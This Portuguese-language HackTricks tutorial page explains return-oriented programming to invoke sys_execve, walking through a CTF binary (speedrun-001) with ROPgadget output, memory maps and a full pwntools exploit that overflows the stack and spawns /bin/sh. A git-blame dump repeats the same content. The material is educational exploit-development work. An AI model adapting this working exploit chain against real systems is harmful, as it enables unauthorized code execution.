hacktricks/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md

# ROP - chamar sys\_execve

<details>

<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras maneiras de apoiar o HackTricks:

* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>

Para preparar a chamada para o **syscall** é necessário a seguinte configuração:

* `rax: 59 Especifica sys_execve`
* `rdi: ptr para "/bin/sh" especifica o arquivo a ser executado`
* `rsi: 0 especifica que nenhum argumento é passado`
* `rdx: 0 especifica que nenhuma variável de ambiente é passada`

Portanto, basicamente é necessário escrever a string `/bin/sh` em algum lugar e então realizar o `syscall` (estando ciente do preenchimento necessário para controlar a pilha).

## Controlar os registradores

Vamos começar encontrando **como controlar esses registradores**:
```c
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```
Com esses endereços, é possível **escrever o conteúdo na pilha e carregá-lo nos registradores**.

## Escrever string

### Memória gravável

Primeiro, você precisa encontrar um local gravável na memória
```bash
gef> vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
```
### Escrever String

Em seguida, você precisa encontrar uma maneira de escrever conteúdo arbitrário neste endereço
```python
ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```
#### 32 bits
```python
'''
Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''

rop += popRdx           # place value into EAX
rop += "/bin"           # 4 bytes at a time
rop += popRax           # place value into edx
rop += p32(0x6b6000)    # Writable memory
rop += writeGadget   #Address to: mov qword ptr [rax], rdx

rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget
```
#### 64 bits
```python
'''
Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
```
## Exemplo
```python
from pwn import *

target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')

# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)

# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)

# Our syscall gadget
syscall = p64(0x40129c)

'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget

'''
Prep the four registers with their arguments, and make the syscall

pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0

syscall
'''

rop += popRax
rop += p64(0x3b)

rop += popRdi
rop += p64(0x6b6000)

rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)

rop += syscall


# Add the padding to the saved return address
payload = "0"*0x408 + rop

# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)

target.interactive()
```
## Referências

* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)

<details>

<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras maneiras de apoiar o HackTricks:

* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`# ROP - chamar sys\_execve`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`Outras maneiras de apoiar o HackTricks:`

			`* Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [swag oficial PEASS & HackTricks](https://peass.creator-spring.com)`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`* Junte-se ao 💬 [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).`
			`* Compartilhe seus truques de hacking enviando PRs para os [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`Para preparar a chamada para o syscall é necessário a seguinte configuração:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			* `rax: 59 Especifica sys_execve`
			* `rdi: ptr para "/bin/sh" especifica o arquivo a ser executado`
			* `rsi: 0 especifica que nenhum argumento é passado`
			* `rdx: 0 especifica que nenhuma variável de ambiente é passada`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			Portanto, basicamente é necessário escrever a string `/bin/sh` em algum lugar e então realizar o `syscall` (estando ciente do preenchimento necessário para controlar a pilha).
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Controlar os registradores`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Vamos começar encontrando como controlar esses registradores:`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			```c
GITBOOK-3870: change request with no subject merged in GitBook 2023-04-11 01:00:47 +00:00			`ROPgadget --binary speedrun-001 \| grep -E "pop (rdi\|rsi\|rdx\rax) ; ret"`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			`0x0000000000415664 : pop rax ; ret`
			`0x0000000000400686 : pop rdi ; ret`
			`0x00000000004101f3 : pop rsi ; ret`
			`0x00000000004498b5 : pop rdx ; ret`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Com esses endereços, é possível escrever o conteúdo na pilha e carregá-lo nos registradores.`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`## Escrever string`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### Memória gravável`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`Primeiro, você precisa encontrar um local gravável na memória`
GitBook: [master] one page modified 2020-11-28 20:05:01 +00:00			```bash
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			`gef> vmmap`
			`[ Legend: Code \| Heap \| Stack ]`
			`Start End Offset Perm Path`
			`0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001`
			`0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001`
			`0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`### Escrever String`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`Em seguida, você precisa encontrar uma maneira de escrever conteúdo arbitrário neste endereço`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			```python
			`ROPgadget --binary speedrun-001 \| grep " : mov qword ptr \["`
			`mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx`
			```
GITBOOK-3870: change request with no subject merged in GitBook 2023-04-11 01:00:47 +00:00			`#### 32 bits`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			```python
			`'''`
			`Lets write "/bin/sh" to 0x6b6000`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			`pop rdx, 0x2f62696e2f736800`
			`pop rax, 0x6b6000`
			`mov qword ptr [rax], rdx`
			`'''`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			`rop += popRdx # place value into EAX`
			`rop += "/bin" # 4 bytes at a time`
			`rop += popRax # place value into edx`
			`rop += p32(0x6b6000) # Writable memory`
			`rop += writeGadget #Address to: mov qword ptr [rax], rdx`

			`rop += popRdx`
			`rop += "//sh"`
			`rop += popRax`
			`rop += p32(0x6b6000 + 4)`
			`rop += writeGadget`
			```
GITBOOK-3870: change request with no subject merged in GitBook 2023-04-11 01:00:47 +00:00			`#### 64 bits`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			```python
			`'''`
			`Lets write "/bin/sh" to 0x6b6000`

			`pop rdx, 0x2f62696e2f736800`
			`pop rax, 0x6b6000`
			`mov qword ptr [rax], rdx`
			`'''`
			`rop = ''`
			`rop += popRdx`
			`rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end`
			`rop += popRax`
			`rop += p64(0x6b6000) # Writable memory`
			`rop += writeGadget #Address to: mov qword ptr [rax], rdx`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Exemplo`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			```python
			`from pwn import *`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			`target = process('./speedrun-001')`
			`#gdb.attach(target, gdbscript = 'b *0x400bad')`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			`# Establish our ROP Gadgets`
			`popRax = p64(0x415664)`
			`popRdi = p64(0x400686)`
			`popRsi = p64(0x4101f3)`
			`popRdx = p64(0x4498b5)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00			`# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret`
			`writeGadget = p64(0x48d251)`

			`# Our syscall gadget`
			`syscall = p64(0x40129c)`

			`'''`
			`Here is the assembly equivalent for these blocks`
			`write "/bin/sh" to 0x6b6000`

			`pop rdx, 0x2f62696e2f736800`
			`pop rax, 0x6b6000`
			`mov qword ptr [rax], rdx`
			`'''`
			`rop = ''`
			`rop += popRdx`
			`rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end`
			`rop += popRax`
			`rop += p64(0x6b6000)`
			`rop += writeGadget`

			`'''`
			`Prep the four registers with their arguments, and make the syscall`

			`pop rax, 0x3b`
			`pop rdi, 0x6b6000`
			`pop rsi, 0x0`
			`pop rdx, 0x0`

			`syscall`
			`'''`

			`rop += popRax`
			`rop += p64(0x3b)`

			`rop += popRdi`
			`rop += p64(0x6b6000)`

			`rop += popRsi`
			`rop += p64(0)`
			`rop += popRdx`
			`rop += p64(0)`

			`rop += syscall`


			`# Add the padding to the saved return address`
			`payload = "0"*0x408 + rop`

			`# Send the payload, drop to an interactive shell to use our new shell`
			`target.sendline(payload)`

Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`target.interactive()`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Referências`
GitBook: [master] 19 pages and 4 assets modified 2021-09-25 16:33:43 +00:00
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`Outras maneiras de apoiar o HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`* Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, verifique os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [swag oficial PEASS & HackTricks](https://peass.creator-spring.com)`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`* Junte-se ao 💬 [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).`
			`* Compartilhe seus truques de hacking enviando PRs para os [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`